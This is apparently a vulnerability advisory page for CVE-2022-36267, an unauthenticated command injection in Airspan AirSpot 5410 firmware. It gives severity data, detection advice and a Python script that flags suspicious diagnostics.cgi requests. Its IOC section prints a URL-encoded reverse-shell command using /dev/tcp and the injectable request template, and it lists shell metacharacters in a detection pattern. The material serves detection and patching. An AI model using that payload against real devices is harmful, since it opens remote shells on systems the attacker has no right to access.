CVE-2022-36267
published 2022-08-08


Priority: P191 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 53.75% (98.9th percentile)
In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists an unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious HTTP request by injecting code in one of the parameters, allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi, which accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

Affected (1 range)

Vendor    Product                  Version range    Fixed in
airspan   airspot_5410_firmware    <= 0.3.4.1-4     (none listed)

Detection & IOCs (extracted from sources)

path: /home/www/cgi-bin/diagnostics.cgi
url: https://<RHOST>:<RPORT>/cgi-bin/diagnostics.cgi
command: `sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{LHOST}%2F{LPORT}%200%3E%261`
other: Command=pingDiagnostic&targetIP=1.1.1.1<PAYLOAD>&packetSize=55&timeOut=10&count=1
version: 0.3.4.1-4
  • Monitor for unauthenticated HTTP POST requests to /cgi-bin/diagnostics.cgi on Airspan AirSpot 5410 devices, especially those lacking a session/auth cookie.
  • Alert on POST bodies to diagnostics.cgi containing shell metacharacters (backticks, %60, %3E%26, /dev/tcp) in the targetIP parameter, indicating a command injection attempt.
  • Detect POST requests to diagnostics.cgi where the 'targetIP' field contains values other than a valid IP address (e.g., contains backticks, semicolons, or URL-encoded shell operators).
  • Flag outbound TCP connections from the AirSpot device process space (diagnostics.cgi / sh) to arbitrary external hosts, indicative of a reverse shell being established.
  • The vulnerable endpoint is served over HTTPS (port 443 by default) with no authentication required; SSL inspection may be needed to inspect POST body contents for detection.
  • All firmware versions 0.3.4.1-4 and below are affected; ensure version checks target this range when scoping detection or patching.
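The second and third detection bullets above, implemented as a small Python check over constructed request samples. This is an added example, not code from cvebase, Airspan or any of the cited sources; the field names follow the request shape listed under IOCs, and the has_session_cookie flag is a hypothetical stand-in for whatever the deployment's HTTP logs actually record about authentication state.

```python
import ipaddress
from urllib.parse import parse_qs, unquote

# Shell metacharacters and sequences named in the detection bullets. They are
# matched against the percent-decoded targetIP value, so %60 and %3E%26 are caught.
SHELL_MARKERS = ("`", ";", "|", "&", "$(", ">", "<", "/dev/tcp")

# Constructed sample POSTs: (request path, form body, has_session_cookie).
# The second one carries a harmless backtick injection for demonstration.
SAMPLE_REQUESTS = [
    ("/cgi-bin/diagnostics.cgi",
     "Command=pingDiagnostic&targetIP=1.1.1.1&packetSize=55&timeOut=10&count=1", True),
    ("/cgi-bin/diagnostics.cgi",
     "Command=pingDiagnostic&targetIP=1.1.1.1%60id%60&packetSize=55&timeOut=10&count=1", False),
    ("/cgi-bin/diagnostics.cgi",
     "Command=pingDiagnostic&targetIP=example.com&packetSize=55&timeOut=10&count=1", True),
    ("/cgi-bin/status.cgi", "foo=bar", False),
]


def parse_body(body: str) -> dict:
    """Parse a form-encoded body into single-valued fields (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_valid_ip(value: str) -> bool:
    """True only if the value is a syntactically valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def inspect_request(path: str, body: str, has_session_cookie: bool) -> list:
    """Return alert reason codes for one POST; an empty list means nothing to flag."""
    reasons = []
    if not path.endswith("/cgi-bin/diagnostics.cgi"):
        return reasons
    if not has_session_cookie:
        reasons.append("unauthenticated")
    fields = parse_body(body)
    # parse_qs already decoded once; a second unquote catches double-encoded payloads.
    target = unquote(fields.get("targetIP", ""))
    if not is_valid_ip(target):
        reasons.append("targetip_not_ip")
    if any(marker in target for marker in SHELL_MARKERS):
        reasons.append("shell_metachar")
    return reasons


def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Run inspect_request over every sample and return the per-request reasons."""
    return [inspect_request(*req) for req in requests]


if __name__ == "__main__":
    for req, reasons in zip(SAMPLE_REQUESTS, scan_all()):
        print(req[0], reasons or "clean")
```

The strict whole-value IP check is the more robust of the two rules: a hostname such as example.com is flagged even though it carries no metacharacters, which matches the third bullet's intent that anything other than a valid IP in targetIP is suspicious for this endpoint.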

CVSS provenance

nvd (v3.1): 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL